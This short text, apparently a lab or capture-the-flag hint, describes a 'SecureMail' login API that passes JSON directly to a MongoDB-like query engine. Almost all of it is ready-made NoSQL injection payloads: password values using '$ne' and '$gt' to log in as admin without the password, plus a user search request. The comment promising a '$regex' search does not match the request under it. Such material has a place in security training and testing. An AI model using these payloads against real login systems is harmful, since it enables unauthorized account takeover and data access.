SecureMail's login API accepts JSON and passes it directly to a MongoDB-like query engine. Use NoSQL operators like $ne, $gt, $regex to bypass authentication.
# Bypass auth with $ne operator:
{"username":"admin","password":{"$ne":""}}
# Login as any user with $gt:
{"username":"admin","password":{"$gt":""}}
# Search users with $regex:
POST /api/users/search
{"role":"admin"}